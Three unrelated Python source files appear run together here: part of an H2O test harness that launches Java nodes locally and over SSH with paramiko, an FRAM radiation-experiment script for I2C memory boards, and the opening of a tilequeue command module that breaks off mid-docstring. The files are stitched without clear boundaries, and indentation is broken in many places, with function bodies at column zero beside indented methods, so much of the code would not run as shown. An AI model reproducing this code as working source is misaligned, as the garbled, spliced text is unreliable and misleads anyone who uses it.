def sandbox_error_report(self, done=None):
# not clearable..just or in new value
if done:
self.sandbox_error_was_reported = True
return (self.sandbox_error_was_reported)
    def get_args(self):
        """Assemble the java command line used to launch this h2o node.

        Returns a flat list of argv tokens (whitespace-split), suitable for
        psutil/Popen. Note several h2o flags are built as single
        'name value' strings and rely on the final whitespace re-split below.
        """
        args = ['java']
        # I guess it doesn't matter if we use flatfile for both now
        # defaults to not specifying
        # FIX! we need to check that it's not outside the limits of the dram of the machine it's running on?
        if self.java_heap_GB is not None:
            if not (1 <= self.java_heap_GB <= 256):
                raise Exception('java_heap_GB <1 or >256 (GB): %s' % (self.java_heap_GB))
            args += ['-Xms%dG' % self.java_heap_GB]
            args += ['-Xmx%dG' % self.java_heap_GB]
        if self.java_heap_MB is not None:
            if not (1 <= self.java_heap_MB <= 256000):
                raise Exception('java_heap_MB <1 or >256000 (MB): %s' % (self.java_heap_MB))
            args += ['-Xms%dm' % self.java_heap_MB]
            args += ['-Xmx%dm' % self.java_heap_MB]
        if self.java_extra_args is not None:
            args += ['%s' % self.java_extra_args]
        if self.use_debugger:
            # currently hardwire the base port for debugger to 8000
            # increment by one for every node we add
            # sence this order is different than h2o cluster order, print out the ip and port for the user
            # we could save debugger_port state per node, but not really necessary (but would be more consistent)
            debuggerBasePort = 8000
            if self.node_id is None:
                debuggerPort = debuggerBasePort
            else:
                debuggerPort = debuggerBasePort + self.node_id
            if self.http_addr:
                a = self.http_addr
            else:
                a = "localhost"
            if self.port:
                b = str(self.port)
            else:
                b = "h2o determined"
            # I guess we always specify port?
            print "You can attach debugger at port %s for jvm at %s:%s" % (debuggerPort, a, b)
            args += ['-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=%s' % debuggerPort]
        if self.disable_assertions:
            print "WARNING: h2o is running with assertions disabled"
        else:
            args += ["-ea"]
        if self.use_maprfs:
            args += ["-Djava.library.path=/opt/mapr/lib"]
        if self.classpath:
            # NOTE(review): `glob` is used here but is not in this file's
            # imports -- this branch would raise NameError; confirm whether
            # classpath mode is ever used, or add `import glob` at the top.
            entries = [find_file('build/classes'), find_file('lib/javassist.jar')]
            entries += glob.glob(find_file('lib') + '/*/*.jar')
            entries += glob.glob(find_file('lib') + '/*/*/*.jar')
            args += ['-classpath', os.pathsep.join(entries), 'water.Boot']
        else:
            args += ["-jar", self.get_h2o_jar()]
        # always-on toggle (dead switch kept for easy experimentation)
        if 1==1:
            if self.hdfs_config:
                args += [
                    '-hdfs_config ' + self.hdfs_config
                ]
        if h2o_args.beta_features:
            # no -beta
            # args += ["-beta"]
            pass
        if self.network:
            args += ["-network " + self.network]
        # H2O should figure it out, if not specified
        # DON"T EVER USE on multi-machine...h2o should always get it right, to be able to run on hadoop
        # where it's not told
        # new 10/22/14. Allow forcing the ip when we do remote, for networks with bridges, where
        # h2o can't self identify (does -network work?)
        if self.force_ip and self.h2o_addr:  # should always have an addr if force_ip...but..
            args += [
                '-ip %s' % self.h2o_addr,
            ]
        # Need to specify port, since there can be multiple ports for an ip in the flatfile
        if self.port is not None:
            args += [
                "-port %d" % self.port,
            ]
        if self.use_flatfile:
            args += [
                '-flatfile ' + self.flatfile,
            ]
        args += [
            '-ice_root %s' % self.get_ice_dir(),
            # if I have multiple jenkins projects doing different h2o clouds, I need
            # I need different ports and different cloud name.
            # does different cloud name prevent them from joining up
            # (even if same multicast ports?)
            # I suppose I can force a base address. or run on another machine?
        ]
        args += [
            '-name ' + self.cloud_name
        ]
        # ignore the other -hdfs args if the config is used?
        # always-off toggle (dead switch kept deliberately)
        if 1==0:
            if self.hdfs_config:
                args += [
                    '-hdfs_config ' + self.hdfs_config
                ]
        if self.use_hdfs:
            args += [
                # it's fine if hdfs_name has a ":9000" port or something too
                '-hdfs hdfs://' + self.hdfs_name_node,
                '-hdfs_version ' + self.hdfs_version,
            ]
        if self.use_maprfs:
            args += [
                # 3 slashes?
                '-hdfs maprfs:///' + self.hdfs_name_node,
                '-hdfs_version ' + self.hdfs_version,
            ]
        if self.aws_credentials:
            args += ['-aws_credentials ' + self.aws_credentials]
        # passed thru build_cloud in test, or global from commandline arg
        if self.random_udp_drop or h2o_args.random_udp_drop:
            args += ['-random_udp_drop']
        if self.force_tcp:
            args += ['-force_tcp']
        if self.disable_h2o_log:
            args += ['-nolog']
        # psutil psopen needs param/value in different arg elements
        # othetwise we'd need to pass as joined string, and run /bin/sh
        # this joins them up with space, then splits on space.
        # works as long as no pathnames have embedded space, which should be true
        # for unix, maybe not windows. For windows we join them as string before use in psopen
        argsSplitByWhiteSpace = " ".join(args).split()
        return argsSplitByWhiteSpace
#*****************************************************************
import h2o_methods
class LocalH2O(H2O):
'''An H2O instance launched by the python framework on the local host using psutil'''
    def __init__(self, *args, **kwargs):
        """Record config via H2O.__init__, then spawn the jvm locally with psutil."""
        super(LocalH2O, self).__init__(*args, **kwargs)
        self.rc = None  # cached exit code; filled in by wait()
        # FIX! no option for local /home/username ..always the sandbox (LOG_DIR)
        self.ice = tmp_dir('ice.')
        self.flatfile = flatfile_pathname()
        # so we can tell if we're remote or local. Apparently used in h2o_import.py
        self.remoteH2O = False
        h2o_os_util.check_port_group(self.port)
        h2o_os_util.show_h2o_processes()
        if self.node_id is not None:
            logPrefix = 'local-h2o-' + str(self.node_id)
        else:
            logPrefix = 'local-h2o'
        # see https://docs.python.org/2/library/subprocess.html#subprocess.Popen
        # for why I'm using shlex to split the cmd string into a sequence
        # confusing issues, especially when thinking about windows too
        # OS/build      | os.name | platform.system()
        # -------------+---------+-----------------------
        # Win32 native | nt      | Windows
        # Win32 cygwin | posix   | CYGWIN_NT-5.1*
        # Win64 native | nt      | Windows
        # Win64 cygwin | posix   | CYGWIN_NT-6.1-WOW64*
        # Linux        | posix   | Linux
        # make it a string if cygwin or windows
        # in unix, the args was created with split by space. (assumption is no pathname has space)
        # need to pass string in windows..doesn't seem to assemble string from args list correctly
        # could make unix use shell and pass string?
        pf = platform.system()
        print "System is %s" % pf
        cmd = self.get_args()
        if re.match('win', pf, re.IGNORECASE):  # covers cygwin and windows
            cmd = " ".join(cmd)
        spawn = spawn_cmd(logPrefix, cmd=cmd, capture_output=self.capture_output)
        # keep the psutil process handle for is_alive/terminate/wait
        self.ps = spawn[0]
    def get_h2o_jar(self):
        # Local nodes always run the jar out of the source tree build.
        return find_file('build/h2o.jar')

    def get_flatfile(self):
        # Flatfile path was materialized in __init__.
        return self.flatfile
        # return find_file(flatfile_pathname())

    def get_ice_dir(self):
        # Per-node ice (scratch) directory created in __init__.
        return self.ice
def is_alive(self):
verboseprint("Doing is_alive check for LocalH2O", self.wait(0))
return self.wait(0) is None
def terminate_self_only(self):
def on_terminate(proc):
print("process {} terminated".format(proc))
waitingForKill = False
try:
# we already sent h2o shutdown and waited a second. Don't bother checking if alive still.
# send terminate...wait up to 3 secs, then send kill
self.ps.terminate()
gone, alive = wait_procs(procs=[self.ps], timeout=3, callback=on_terminate)
if alive:
self.ps.kill()
# from http://code.google.com/p/psutil/wiki/Documentation: wait(timeout=None) Wait for process termination
# If the process is already terminated does not raise NoSuchProcess exception but just return None immediately.
# If timeout is specified and process is still alive raises TimeoutExpired exception.
# hmm. maybe we're hitting the timeout
waitingForKill = True
return self.wait(timeout=3)
except psutil.NoSuchProcess:
return -1
except:
if waitingForKill:
# this means we must have got the exception on the self.wait()
# just print a message
print "\nUsed psutil to kill h2o process...but"
print "It didn't die within 2 secs. Maybe will die soon. Maybe not! At: %s" % self.http_addr
else:
print "Unexpected exception in terminate_self_only: ignoring"
# hack.
# psutil 2.x needs function reference
# psutil 1.x needs object reference
if hasattr(self.ps.cmdline, '__call__'):
pcmdline = self.ps.cmdline()
else:
pcmdline = self.ps.cmdline
print "process cmdline:", pcmdline
return -1
    def terminate(self):
        """Kill the local node if it's still alive (a shutdown was already requested)."""
        # send a shutdown request first.
        # since local is used for a lot of buggy new code, also do the ps kill.
        # try/except inside shutdown_all now
        if self.is_alive():
            print "\nShutdown didn't work fast enough for local node? : %s. Will kill though" % self
        self.terminate_self_only()
def wait(self, timeout=0):
if self.rc is not None:
return self.rc
try:
self.rc = self.ps.wait(timeout)
return self.rc
except psutil.TimeoutExpired:
return None
    def stack_dump(self):
        # SIGQUIT makes the jvm dump all thread stacks (without exiting).
        self.ps.send_signal(signal.SIGQUIT)
# to see all the methods
# print dump_json(dir(LocalH2O))
#*****************************************************************
class RemoteH2O(H2O):
'''An H2O instance launched by the python framework on a specified host using openssh'''
    def __init__(self, host, *args, **kwargs):
        """Upload the jar/flatfile/credentials to *host* and launch h2o over ssh.

        host -- a RemoteHost; its ssh connection is used for uploads and exec.
        """
        super(RemoteH2O, self).__init__(*args, **kwargs)
        # it gets set True if an address is specified for LocalH2o init. Override.
        if 'force_ip' in kwargs:
            self.force_ip = kwargs['force_ip']
        self.remoteH2O = True  # so we can tell if we're remote or local
        self.jar = host.upload_file('build/h2o.jar')
        # need to copy the flatfile. We don't always use it (depends on h2o args)
        self.flatfile = host.upload_file(flatfile_pathname())
        # distribute AWS credentials
        if self.aws_credentials:
            self.aws_credentials = host.upload_file(self.aws_credentials)
        if self.hdfs_config:
            self.hdfs_config = host.upload_file(self.hdfs_config)
        if self.use_home_for_ice:
            # this will be the username used to ssh to the host
            self.ice = "/home/" + host.username + '/ice.%d.%s' % (self.port, time.time())
        else:
            self.ice = '/tmp/ice.%d.%s' % (self.port, time.time())
        self.channel = host.open_channel()
        ### FIX! TODO...we don't check on remote hosts yet
        # this fires up h2o over there
        cmd = ' '.join(self.get_args())
        # UPDATE: somehow java -jar on cygwin target (xp) can't handle /tmp/h2o*jar
        # because it's a windows executable and expects windows style path names.
        # but if we cd into /tmp, it can do java -jar h2o*jar.
        # So just split out the /tmp (pretend we don't know) and the h2o jar file name
        # Newer windows may not have this problem? Do the ls (this goes into the local stdout
        # files) so we can see the file is really where we expect.
        # This hack only works when the dest is /tmp/h2o*jar. It's okay to execute
        # with pwd = /tmp. If /tmp/ isn't in the jar path, I guess things will be the same as
        # normal.
        if 1 == 0:  # enable if you want windows remote machines
            cmdList = ["cd /tmp"]  # separate by ;<space> when we join
            cmdList += ["ls -ltr " + self.jar]
            cmdList += [re.sub("/tmp/", "", cmd)]
            self.channel.exec_command("; ".join(cmdList))
        else:
            self.channel.exec_command(cmd)
        # tee the remote stdout/stderr into local sandbox log files (or our console)
        if self.capture_output:
            if self.node_id is not None:
                logPrefix = 'remote-h2o-' + str(self.node_id)
            else:
                logPrefix = 'remote-h2o'
            logPrefix += '-' + host.h2o_addr
            outfd, outpath = tmp_file(logPrefix + '.stdout.', '.log')
            errfd, errpath = tmp_file(logPrefix + '.stderr.', '.log')
            drain(self.channel.makefile(), outfd)
            drain(self.channel.makefile_stderr(), errfd)
            comment = 'Remote on %s, stdout %s, stderr %s' % (
                self.h2o_addr, os.path.basename(outpath), os.path.basename(errpath))
        else:
            drain(self.channel.makefile(), sys.stdout)
            drain(self.channel.makefile_stderr(), sys.stderr)
            comment = 'Remote on %s' % self.h2o_addr
        log(cmd, comment=comment)
    def get_h2o_jar(self):
        # Path of the jar as uploaded to the remote host.
        return self.jar

    def get_flatfile(self):
        # Path of the flatfile as uploaded to the remote host.
        return self.flatfile

    def get_ice_dir(self):
        # Remote ice (scratch) directory chosen in __init__.
        return self.ice
def is_alive(self):
verboseprint("Doing is_alive check for RemoteH2O")
if self.channel.closed: return False
if self.channel.exit_status_ready(): return False
try:
self.get_cloud(noExtraErrorCheck=True)
return True
except:
return False
    def terminate_self_only(self):
        """Drop the ssh channel; the allocated pty forces the remote jvm to die with it."""
        self.channel.close()
        # Don't check afterwards. api watchdog in h2o might complain
        # always-off dead debug code, kept deliberately for reference
        if 1==0:
            time.sleep(1)  # a little delay needed?
            # kbn: it should be dead now? want to make sure we don't have zombies
            # we should get a connection error. doing a is_alive subset.
            try:
                gc_output = self.get_cloud(noExtraErrorCheck=True)
                raise Exception("get_cloud() should fail after we terminate a node. It isn't. %s %s" % (self, gc_output))
            except:
                return True

    def terminate(self):
        # Remote nodes need no extra cleanup beyond closing the channel.
        self.terminate_self_only()
#*****************************************************************
class ExternalH2O(H2O):
'''A cloned H2O instance assumed to be created by others, that we can interact with via json requests (urls)
Gets initialized with state from json created by another build_cloud, so all methods should work 'as-if"
the cloud was built by the test (normally).
The normal build_cloud() parameters aren't passed here, the final node state is! (and used for init)
The list should be complete, as long as created by build_cloud(create_json=True) or
build_cloud_with_hosts(create_json=True)
Obviously, no psutil or paramiko work done here.
'''
    def __init__(self, nodeState):
        """Clone node attributes from a json-derived dict (no launching done here).

        nodeState -- flat dict of attribute name -> value, as written by
        build_cloud(create_json=True); string-encoded None/bools are fixed up.
        """
        for k, v in nodeState.iteritems():
            verboseprint("init:", k, v)
            # hack because it looks like the json is currently created with "None" for values of None
            # rather than worrying about that, just translate "None" to None here. "None" shouldn't exist
            # for any other reason.
            if v == "None":
                v = None
            elif v == "false":
                v = False
            elif v == "true":
                v = True
            # leave "null" as-is (string) for now?
            setattr(self, k, v)  # achieves self.k = v
        ## print "Cloned", len(nodeState), "things for a h2o node"
def is_alive(self):
verboseprint("Doing is_alive check for ExternalH2O")
try:
self.get_cloud()
return True
except:
return False
    # no terminate_self_only method
    def terminate_self_only(self):
        # We did not launch this cloud, so there is no process handle to kill.
        raise Exception("terminate_self_only() not supported for ExternalH2O")

    def terminate(self):
        # Best we can do for an external cloud: ask it to shut down over json.
        self.shutdown_all()
#*****************************************************************
class RemoteHost(object):
    def upload_file(self, f, progress=None):
        """Upload local file *f* to /tmp on this host via sftp; returns the remote path.

        The remote name is content+user hashed, so identical files are uploaded
        once and reused across calls (cached in self.uploaded).
        progress -- optional paramiko sftp.put progress callback.
        """
        # FIX! we won't find it here if it's hdfs://172.16.2.151/ file
        f = find_file(f)
        if f not in self.uploaded:
            start = time.time()
            # legacy Python 2 `md5` module (removed in py3; hashlib.md5 is the
            # modern equivalent) -- used only to build a unique dest name
            import md5
            m = md5.new()
            m.update(open(f).read())
            m.update(getpass.getuser())
            dest = '/tmp/' + m.hexdigest() + "-" + os.path.basename(f)
            # sigh. we rm/create sandbox in build_cloud now
            # (because nosetests doesn't exec h2o_main and we
            # don't want to code "clean_sandbox()" in all the tests.
            # So: we don't have a sandbox here, or if we do, we're going to delete it.
            # Just don't log anything until build_cloud()? that should be okay?
            # we were just logging this upload message..not needed.
            # log('Uploading to %s: %s -> %s' % (self.http_addr, f, dest))
            sftp = self.ssh.open_sftp()
            # check if file exists on remote side
            # does paramiko have issues with big files? (>1GB, or 650MB?). maybe we don't care.
            # This would arise (as mentioned in the source, line no 667,
            # http://www.lag.net/paramiko/docs/paramiko.sftp_client-pysrc.html) when there is
            # any error reading the packet or when there is EOFError
            # but I'm getting sftp close here randomly at sm.
            # http://stackoverflow.com/questions/22708942/python-paramiko-module-error-with-callback
            # http://stackoverflow.com/questions/15010540/paramiko-sftp-server-connection-dropped
            # http://stackoverflow.com/questions/12322210/handling-paramiko-sshexception-server-connection-dropped
            try:
                # note we don't do a md5 compare. so if a corrupted file was uploaded we won't re-upload
                # until we do another build.
                sftp.stat(dest)
                print "{0} Skipping upload of file {1}. File {2} exists on remote side!".format(self, f, dest)
            except IOError, e:
                # if self.channel.closed or self.channel.exit_status_ready():
                #     raise Exception("something bad happened to our %s being used for sftp. keepalive? %s %s" % \
                #         (self, self.channel.closed, self.channel.exit_status_ready()))
                if e.errno == errno.ENOENT:  # no such file or directory
                    verboseprint("{0} uploading file {1}".format(self, f))
                    sftp.put(f, dest, callback=progress)
                    # if you want to track upload times
                    ### print "\n{0:.3f} seconds".format(time.time() - start)
                elif e.errno == errno.EEXIST:  # File Exists
                    pass
                else:
                    print "Got unexpected errno: %s on paramiko sftp." % e.errno
                    print "Lookup here: https://docs.python.org/2/library/errno.html"
                    # throw the exception again, if not what we expected
                    exc_info = sys.exc_info()
                    # Python 2 three-arg raise: re-raise with original traceback
                    raise exc_info[1], None, exc_info[2]
            finally:
                sftp.close()
            self.uploaded[f] = dest
        sys.stdout.flush()
        return self.uploaded[f]
    def record_file(self, f, dest):
        '''Record a file as having been uploaded by external means'''
        # lets push_file_to_remotes() / upload_file() treat it as already present
        self.uploaded[f] = dest
def run_cmd(self, cmd):
log('Running `%s` on %s' % (cmd, self))
(stdin, stdout, stderr) = self.ssh.exec_command(cmd)
stdin.close()
sys.stdout.write(stdout.read())
sys.stdout.flush()
stdout.close()
sys.stderr.write(stderr.read())
sys.stderr.flush()
stderr.close()
def push_file_to_remotes(self, f, hosts):
dest = self.uploaded[f]
for h in hosts:
if h == self: continue
self.run_cmd('scp %s %s@%s:%s' % (dest, h.username, h.h2o_addr, dest))
h.record_file(f, dest)
    def __init__(self, addr, username=None, password=None, **kwargs):
        """Open a keepalive ssh connection to *addr* (password optional).

        Extra **kwargs pass straight through to paramiko's SSHClient.connect.
        """
        import paramiko
        # To debug paramiko you can use the following code:
        #paramiko.util.log_to_file('/tmp/paramiko.log')
        #paramiko.common.logging.basicConfig(level=paramiko.common.DEBUG)
        # kbn. trying 9/23/13. Never specify -ip on java command line for multi-node
        # but self.h2o_addr is used elsewhere. so look at self.remoteH2O to disable in get_args()
        # by definition, this must be the publicly visible addrs, otherwise we can't ssh or browse!
        self.h2o_addr = addr
        self.http_addr = addr
        self.username = username  # this works, but it's host state
        self.ssh = paramiko.SSHClient()
        # don't require keys. If no password, assume passwordless setup was done
        policy = paramiko.AutoAddPolicy()
        self.ssh.set_missing_host_key_policy(policy)
        self.ssh.load_system_host_keys()
        if password is None:
            self.ssh.connect(self.h2o_addr, username=username, **kwargs)
        else:
            self.ssh.connect(self.h2o_addr, username=username, password=password, **kwargs)
        # keep connection - send keepalive packet evety 5minutes
        self.ssh.get_transport().set_keepalive(300)
        # cache of local-path -> remote-path for files already uploaded
        self.uploaded = {}
    def remote_h2o(self, *args, **kwargs):
        # Factory: launch an h2o node on this host; our addr doubles as the node ip.
        return RemoteH2O(self, self.h2o_addr, *args, **kwargs)

    def open_channel(self):
        """Open a fresh ssh session channel with a pty attached."""
        ch = self.ssh.get_transport().open_session()
        ch.get_pty()  # force the process to die without the connection
        return ch

    def __str__(self):
        return 'ssh://%s@%s' % (self.username, self.h2o_addr)
|
fram.py | '''
This file controls the secondary (radiation) experiment
Contributors:
Jillian Frimml
Skyler Puckett
Konstantin Zaremski
'''
# Import modules
from time import sleep
import time
import logging
import os
import multiprocessing as multiprocessing
from adafruit_extended_bus import ExtendedI2C as I2C
import adafruit_fram
# Configuration
FRAM_COOK_DURATION = 0
# Acquire the existing logger
# Acquire the existing logger
# NOTE(review): logging.getLogger() does not raise in practice, so the except
# arm is effectively dead; if it ever fired, `logger` would be None and any
# later logger.* call would crash -- confirm the intended fallback, or use the
# module-level logging.* API throughout.
try:
    logger = logging.getLogger(__name__)
except:
    logger = None
    print('Unable to acquire the global logger object, assuming that sensors.py is being run on its own')
# Main FRAM experiment program loop
def main():
# Configure & initialize the FRAM boards
logging.info(f'Initializing FRAM experiment')
# Creating an array of the bytes that make up monalisa.jpg
sourceByteArray = bytearray()
try:
with open('monalisa.jpg', 'rb') as sourceFile:
sourceByteArray = sourceFile.read()
logging.info(f'Finished building array from input file, {str(len(sourceByteArray))} bytes')
except IOError:
logging.critical('Unable to read in source image (monalisa.jpg)')
# Create the output directory if it does not exist yet
os.system('mkdir -p ./data-fram')
# Configure the I2C busses
i2c = {}
# I2C interface A
try:
i2c['bus0'] = I2C(1)
logging.info('I2C interface A ... OK')
except Exception as error:
logging.critical('Failed to enable i2c interface A')
logging.critical(' ' + str(error))
# Set the interface as None to indicate that it is not working
i2c['bus0'] = None
# I2C interface B
try:
i2c['bus1'] = I2C(4)
logging.info('I2C interface B ... OK')
except Exception as error:
logging.critical('Failed to enable i2c interface B')
logging.critical(' ' + str(error))
# Set the interface as None to indicate that it is not working
i2c['bus1'] = None
# I2C interface C
try:
i2c['bus2'] = I2C(5)
logging.info('I2C interface C ... OK')
except Exception as error:
logging.critical('Failed to enable i2c interface C')
logging.critical(' ' + str(error))
# Set the interface as None to indicate that it is not working
i2c['bus2'] = None
# Find all i2c devices on the busses that are connected
if i2c['bus0'] != None: i2c['devices0'] = i2c['bus0'].scan()
if i2c['bus1'] != None: i2c['devices1'] = i2c['bus1'].scan()
if i2c['bus2'] != None: i2c['devices2'] = i2c['bus2'].scan()
# Build an array of board classes dynamically
fram = [None] * 24
# For each i2c bus
for busNo in range(0, 3):
# If the i2c bus was not configured, do nothing and move on to the next bus
if i2c['bus' + str(busNo)] == None: continue
# For each board that should be connected to the i2c bus
for boardNo in range(0, 8):
# Global board no based on the position in the loops eg.
# bus0 contains fram0 thru fram7
# bus1 contains fram8 thru fram16
# bus2 contains fram16 thru fram21
globalBoardNo = boardNo + (8 * busNo)
try:
fram[globalBoardNo] = adafruit_fram.FRAM_I2C(i2c['bus' + str(busNo)], 0x50 + boardNo)
logging.info(f'FRAM{str(globalBoardNo)} size: {str(len(fram[globalBoardNo]))} bytes')
except Exception as error:
fram[globalBoardNo] = None
logging.error(f'FRAM{str(globalBoardNo)} not detected. {error}')
# ** Define all sub methods used throughout experiment tirals
# Write the source image to the provided FRAM board object
def writeBoard(framBoard, framBoardIndex):
try:
framBoard[0:len(sourceByteArray)] = sourceByteArray[0:len(sourceByteArray)]
except Exception as err:
logging.error(f'Failed write to FRAM board {str(framBoardIndex)}. Error: "{str(err)}"')
# Read back the contents of all FRAM boards and write to file
def readBoard(framBoard, boardNo, trialNo):
    """Read the image-sized region back from one FRAM board to a file.

    The output filename encodes the trial number, board number and a
    unix timestamp. Errors are logged, not raised, so one failing board
    does not stop the trial.
    """
    try:
        cooked = bytearray()
        # read one byte at a time, matching the board driver's indexing
        for byteIndex in range(0, len(sourceByteArray)):
            cooked += framBoard[byteIndex]
        # context manager closes the handle even if write() raises
        # (previously the handle leaked on a write error)
        with open(f'./data-fram/data-fram__trial{str(trialNo)}__board{str(boardNo)}__{str(int(time.time()))}.jpg', 'wb') as resultFile:
            resultFile.write(cooked)
    except Exception as err:
        logging.error(f'Failed read from FRAM board {str(boardNo)} in experiment trial {str(trialNo)}. Error: "{str(err)}"')
# Write all zeros to the FRAM boards present
# -- this function is no longer used
def eraseBoard(framBoard):
    """Overwrite the entire given FRAM board with zero bytes.

    Bug fix: the original sliced/filled len(fram) bytes (the number of
    board slots, 24) instead of the board's own byte capacity.
    """
    boardSize = len(framBoard)
    framBoard[0:boardSize] = [0] * boardSize
# Write the source image to every detected FRAM board, one worker
# process per board. This happens once at payload power-on; the image
# is then read back on every subsequent experiment trial.
startWriteTime = time.time()
logger.info(f'Beginning write of source image to FRAM boards at {str(int(startWriteTime))}')
threads = []
for framBoardIndex, framBoard in enumerate(fram):
    # skip board slots where detection failed
    if framBoard is not None:
        framWriteThread = multiprocessing.Process(target=writeBoard, args=(framBoard, framBoardIndex))
        framWriteThread.start()
        threads.append(framWriteThread)
# Wait for all worker processes to finish
for thread in threads:
    thread.join()
endWriteTime = time.time()
# Bug fix: time.time() differences are in seconds, but the elapsed-time
# label previously read 'ms.'
logger.info(f'Finished writing source image to all FRAM boards at {str(int(endWriteTime))} ({str(int(endWriteTime - startWriteTime))}s. elapsed)')
# Main experiment loop: read every present board back to disk, forever.
experimentTrial = 1
while True:
    logging.info(f'Beginning FRAM experiment trial no. {str(experimentTrial)}')
    # One reader process per present board. Use the board's global slot
    # index so result filenames match the numbering used by writeBoard
    # (framBoardIndex). Bug fix: a separate counter previously skipped
    # missing boards, shifting the board numbers in the output files.
    threads = []
    for boardIndex, framBoard in enumerate(fram):
        if framBoard is not None:
            thread = multiprocessing.Process(target=readBoard, args=(framBoard, boardIndex, experimentTrial))
            thread.start()
            threads.append(thread)
    # Wait for all reader processes to finish before the next trial
    for thread in threads:
        thread.join()
    experimentTrial += 1
# Script entry point: run the experiment only when executed directly,
# not when imported as a module.
if __name__ == '__main__':
    main()
|
command.py | from __future__ import absolute_import
from collections import defaultdict
from collections import namedtuple
from contextlib import closing
from itertools import chain
from ModestMaps.Core import Coordinate
from multiprocessing.pool import ThreadPool
from random import randrange
from tilequeue.config import create_query_bounds_pad_fn
from tilequeue.config import make_config_from_argparse
from tilequeue.format import lookup_format_by_extension
from tilequeue.metro_extract import city_bounds
from tilequeue.metro_extract import parse_metro_extract
from tilequeue.process import process
from tilequeue.process import Processor
from tilequeue.query import DBConnectionPool
from tilequeue.query import make_data_fetcher
from tilequeue.queue import make_sqs_queue
from tilequeue.queue import make_visibility_manager
from tilequeue.store import make_store
from tilequeue.tile import coord_children_range
from tilequeue.tile import coord_int_zoom_up
from tilequeue.tile import coord_is_valid
from tilequeue.tile import coord_marshall_int
from tilequeue.tile import coord_unmarshall_int
from tilequeue.tile import create_coord
from tilequeue.tile import deserialize_coord
from tilequeue.tile import metatile_zoom_from_str
from tilequeue.tile import seed_tiles
from tilequeue.tile import serialize_coord
from tilequeue.tile import tile_generator_for_multiple_bounds
from tilequeue.tile import tile_generator_for_range
from tilequeue.tile import tile_generator_for_single_bounds
from tilequeue.tile import zoom_mask
from tilequeue.toi import load_set_from_fp
from tilequeue.toi import save_set_to_fp
from tilequeue.top_tiles import parse_top_tiles
from tilequeue.utils import grouper
from tilequeue.utils import parse_log_file
from tilequeue.utils import time_block
from tilequeue.worker import DataFetch
from tilequeue.worker import ProcessAndFormatData
from tilequeue.worker import QueuePrint
from tilequeue.worker import S3Storage
from tilequeue.worker import TileQueueReader
from tilequeue.worker import TileQueueWriter
from urllib2 import urlopen
from zope.dottedname.resolve import resolve
import argparse
import datetime
import logging
import logging.config
import multiprocessing
import operator
import os
import os.path
import Queue
import signal
import sys
import threading
import time
import traceback
import yaml
def create_coords_generator_from_tiles_file(fp, logger=None):
    """Yield coordinates parsed from a file-like of serialized coords.

    Blank lines are skipped silently; unparseable lines are skipped and,
    when a logger is supplied, reported with a warning.
    """
    for line in fp:
        line = line.strip()
        if not line:
            continue
        coord = deserialize_coord(line)
        if coord is None:
            if logger is not None:
                # Bug fix: the original applied % to a format string with
                # no %s placeholder, raising TypeError instead of logging.
                logger.warning('Could not parse coordinate from line: %s'
                               % line)
            continue
        yield coord
def lookup_formats(format_extensions):
    """Map a list of file extensions to their tile format objects.

    Raises AssertionError for an extension with no registered format.
    """
    formats = []
    for ext in format_extensions:
        fmt = lookup_format_by_extension(ext)
        assert fmt is not None, 'Unknown extension: %s' % ext
        formats.append(fmt)
    return formats
def uniquify_generator(generator):
    """Yield each distinct item of *generator* exactly once.

    Materializes the input into a set first, so input order is not
    preserved and the input must be finite.
    """
    for item in set(generator):
        yield item
class GetSqsQueueNameForZoom(object):
    """Callable that maps a zoom level to its configured SQS queue name."""

    def __init__(self, zoom_queue_table):
        # zoom level (int) -> queue name
        self.zoom_queue_table = zoom_queue_table

    def __call__(self, zoom):
        # `long` kept deliberately: this module targets Python 2
        assert isinstance(zoom, (int, long))
        assert 0 <= zoom <= 20
        queue_name = self.zoom_queue_table.get(zoom)
        assert queue_name is not None, 'No queue name found for zoom: %d' % zoom
        return queue_name
def make_get_queue_name_for_zoom(zoom_queue_map_cfg, queue_names):
    """Build a zoom -> queue-name lookup from config.

    zoom_queue_map_cfg maps zoom-range strings like '0-10' (inclusive at
    both ends) to queue names; queue_names lists the valid names.
    Returns a GetSqsQueueNameForZoom callable. Raises AssertionError on
    malformed or overlapping ranges.
    """
    zoom_to_queue_name_table = {}
    for zoom_range, queue_name in zoom_queue_map_cfg.items():
        assert queue_name in queue_names
        assert '-' in zoom_range, 'Invalid zoom range: %s' % zoom_range
        zoom_fields = zoom_range.split('-')
        assert len(zoom_fields) == 2, 'Invalid zoom range: %s' % zoom_range
        zoom_start_str, zoom_until_str = zoom_fields
        try:
            zoom_start = int(zoom_start_str)
            zoom_until = int(zoom_until_str)
        except ValueError:
            # int() only raises ValueError here (KeyError was never
            # possible). The original `assert not '...' % zoom_range`
            # also swallowed the message - `not` consumed the string -
            # so raise explicitly to keep it.
            raise AssertionError('Invalid zoom range: %s' % zoom_range)
        assert (0 <= zoom_start <= 20 and
                0 <= zoom_until <= 20 and
                zoom_start <= zoom_until), \
            'Invalid zoom range: %s' % zoom_range
        # expand the range and refuse overlaps between ranges
        for i in range(zoom_start, zoom_until + 1):
            assert i not in zoom_to_queue_name_table, \
                'Overlapping zoom range: %s' % zoom_range
            zoom_to_queue_name_table[i] = queue_name
    result = GetSqsQueueNameForZoom(zoom_to_queue_name_table)
    return result
def make_queue_mapper(queue_mapper_yaml, tile_queue_name_map, toi):
    """Create a queue mapper from its yaml config.

    Supports type 'single' (one named queue) and 'multiple' (zoom-range
    based mapping); any other type fails with AssertionError.
    """
    queue_mapper_type = queue_mapper_yaml.get('type')
    assert queue_mapper_type, 'Missing queue mapper type'
    if queue_mapper_type == 'single':
        queue_name = queue_mapper_yaml.get('name')
        assert queue_name, 'Missing queue name in queue mapper config'
        tile_queue = tile_queue_name_map.get(queue_name)
        assert tile_queue, 'No queue found in mapping for %s' % queue_name
        return make_single_queue_mapper(queue_name, tile_queue)
    elif queue_mapper_type == 'multiple':
        multi_queue_map_yaml = queue_mapper_yaml.get('multiple')
        assert multi_queue_map_yaml, \
            'Missing yaml config for multiple queue mapper'
        # message typo fix: was 'Mulitple'
        assert isinstance(multi_queue_map_yaml, list), \
            'Multiple queue mapper config should be a list'
        return make_multi_queue_group_mapper_from_cfg(
            multi_queue_map_yaml, tile_queue_name_map, toi)
    else:
        assert 0, 'Unknown queue mapper type: %s' % queue_mapper_type
def make_multi_queue_group_mapper_from_cfg(
        multi_queue_map_yaml, tile_queue_name_map, toi):
    """Build a ZoomRangeAndZoomGroupQueueMapper from its yaml entries.

    Each entry names a queue and may carry a start/end zoom range (only
    honoured when both ends are present), a group-by-zoom level and an
